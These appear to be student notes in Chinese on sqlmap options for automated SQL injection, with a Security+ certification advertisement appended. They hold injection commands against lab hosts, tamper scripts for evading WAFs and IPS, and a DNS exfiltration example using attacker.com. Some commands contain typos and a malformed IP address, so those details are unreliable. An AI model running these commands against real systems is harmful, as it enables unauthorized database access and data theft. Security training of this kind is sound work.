SQLMAP自動注入04-----INJECTION
-p
指定掃描的參數,使--level失效
-p "user-agent,referer"
--skip
排除指定的掃描參數
--level=5 --skip="id,user-agent"
URI注入點
sqlmap -u "http://targeturl/param1/value1*/param2/value2/"
[email protected]:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --dbs
SQLMAP自動注入04-----INJECTION
--dbms
MySQL<5.0>
Oracle<11i>
Microsoft SQL Server<2005>
PostgreSQL
Microsoft Access
SQLite
Firebird
Sysbase
SAP MaxDB
DBS
SQLMAP自動注入04-----INJECTION
--os
Linux
Windows
--invalid-bignum / --invalid-logical
通常sqlmap使用負值參數取值失效id=13->id=-13
bignum使用大數使參數值失效id=99999999
Logical使用布爾判斷取值失效id=13 AND 18=19
--no-cast
榨取資料時,sqlmap将所有結果轉換為字元串,并用空格替換NULL結果
老版本mysql資料庫需要開啟此開關
SQLMAP自動注入04-----INJECTION
--no-escape
出于混淆和避免出錯的目的,payload中用單引号界定字元串時,sqlmaps使用
char()編碼逃逸的方法替換字元串
SELECT 'foo'->SELECT CHAR(102)+CHAR(111)+CHAR(111)
本參數講關閉此功能
--prefix / --suffix
query="SELECT * FROM user WHERE id=('",$_GET['id',"')LIMIT 0,1";
sqlmap -u
"http://192.168.136.1.121/sqlmap/sysql/get_str_brackets.php?id=1" -p id--
prefix"')" --suffix "AND('abc'='abc"
query="SELECT * FROM users WHERE id=('1') <PAYLOAD> AND
('adc'='abc')LIMIT 0,1";
SQLMAP自動注入04-----INJECTION
--tamper
混淆腳本,用于繞過應用層過濾、IPS、WAF
sqlmap -u "http://1.1.1.1/a.php?id=1"--
tamper="tamper/benween.py,tamper/randomcase.py,tamper/space2comment.py" -v 3
[email protected]:~# dpkg -L sqlmap | grep tamper
[email protected]:~# sqlmap -u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1&password=2&user-info-php-submit-button=View+Account+Details" -p "user-agent,username" --tamper="tamper/between.py,tamper/randomcase.py,tamper/space?comment.py" --dbs
SQLMAP自動注入05-----DETECTION
--level
1-5級(預設 1)
/usr/share/sqlmap/xml/payloads
--risk
1-4(預設 1/無害)
Risk升高可造成資料被篡改等風險(update)
--string,--not-string,--regexp,--code,--text-only,--titles
頁面比較,基于布爾的注入檢測,依據傳回頁面内容的變化判斷真假邏輯,但有
些頁面随時間門檻值變化,此時需要人為指定辨別真假的字元串,
[email protected]:~# cd /usr/share/sqlmap/xml/payloads
[email protected]:/usr/share/sqlmap/xml/payloads# ls
01_boolean_blind.xml 02_error_based.xml 03_inline_query.xml 04_stacked_queries.xml
05_time_blind.xml 06_union_query.xml
SQLMAP自動注入06-----TECHNIQUES
預設使用全部技術
B:Boolean-based blind
E:Error-based
U:Union query-based
S:Stacked queries(檔案系統、作業系統,系統資料庫必須)
T:Time-based blind
SQLMAP自動注入06-----TECHNIQUES
--time-sec
基于時間的注入檢測響應延遲時間
--union-cols
預設聯合查詢1-10列,随--level增加最多支援50列
--union-cols 6-9
--union-char
聯合查詢預設使用NULL,極端情況下NULL可能失敗,此時可以手動執行數值
--union-char 123
SQLMAP自動注入06-----TECHNIQUES
--dns-domain
攻擊者控制了某DNS伺服器,使用此功能可以提高資料榨取的速度
--dns-domain attacker.com
--second-order
在一個頁面注入的結果,從另一個頁面展現出來
--second-order http://1.1.1.1/b.php
SQLMAP自動注入07-----FINGERPRINT
-f,--fingerprint,-b,--banner
資料庫管理系統指紋資訊
DBMS,作業系統,架構,更新檔
該筆記為安全牛課堂學員筆記,想看此課程或者資訊安全類幹貨可以移步到安全牛課堂
Security+認證為什麼是網際網路+時代最火爆的認證?
牛妹先給大家介紹一下Security+
Security+ 認證是一種中立第三方認證,其發證機構為美國計算機行業協會CompTIA ;是和CISSP、ITIL 等共同包含在内的國際 IT 業 10 大熱門認證之一,和CISSP偏重資訊安全管理相比,Security+ 認證更偏重資訊安全技術和操作。
通過該認證證明了您具備網絡安全,合規性和操作安全,威脅和漏洞,應用程式、資料和主機安全,通路控制和身份管理以及加密技術等方面的能力。因其考試難度不易,含金量較高,目前已被全球企業和安全專業人士所普遍采納。
Security+認證如此火爆的原因?
原因一:在所有資訊安全認證當中,偏重資訊安全技術的認證是空白的, Security+認證正好可以彌補資訊安全技術領域的空白 。
目前行業内受認可的資訊安全認證主要有CISP和CISSP,但是無論CISP還是CISSP都是偏重資訊安全管理的,技術知識講的寬泛且淺顯,考試都是一帶而過。而且CISSP要求持證人員的資訊安全工作經驗都要5年以上,CISP也要求大專學曆4年以上工作經驗,這些要求無疑把有能力且上進的年輕人的持證之路堵住。在現實社會中,無論是找工作還是升職加薪,或是投标時候報人員,認證都是必不可少的,這給年輕人帶來了很多不公平。而Security+的出現可以掃清這些年輕人職業發展中的障礙,由于Security+偏重資訊安全技術,是以對工作經驗沒有特别的要求。隻要你有IT相關背景,追求進步就可以學習和考試。
原因二: IT運維人員工作與翻身的利器。
在銀行、證券、保險、資訊通訊等行業,IT運維人員非常多,IT運維涉及的工作面也非常廣。是一個集網絡、系統、安全、應用架構、存儲為一體的綜合性技術崗。雖然沒有程式猿們“生當做光棍,死亦寫代碼”的悲壯,但也有着“鋤禾日當午,不如運維苦“的感慨。天天對着電腦和機器,時間長了難免有對于職業發展的迷茫和困惑。Security+國際認證的出現可以讓有追求的IT運維人員學習網絡安全知識,掌握網絡安全實踐。職業發展朝着網絡安全的方向發展,解決國内資訊安全人才的匮乏問題。另外,即使不轉型,要做好運維工作,學習安全知識取得安全認證也是必不可少的。
原因三:接地氣、國際範兒、考試友善、費用适中!
CompTIA作為全球ICT領域最具影響力的全球領先機構,在資訊安全人才認證方面是專業、公平、公正的。Security+認證偏重操作且和一線工程師的日常工作息息相關。适合銀行、證券、保險、網際網路公司等IT相關人員學習。作為國際認證在全球147個國家受到廣泛的認可。
在目前的資訊安全大潮之下,人才是資訊安全發展的關鍵。而目前國内的資訊安全人才是非常匮乏的,相信Security+認證一定會成為最火爆的資訊安全認證。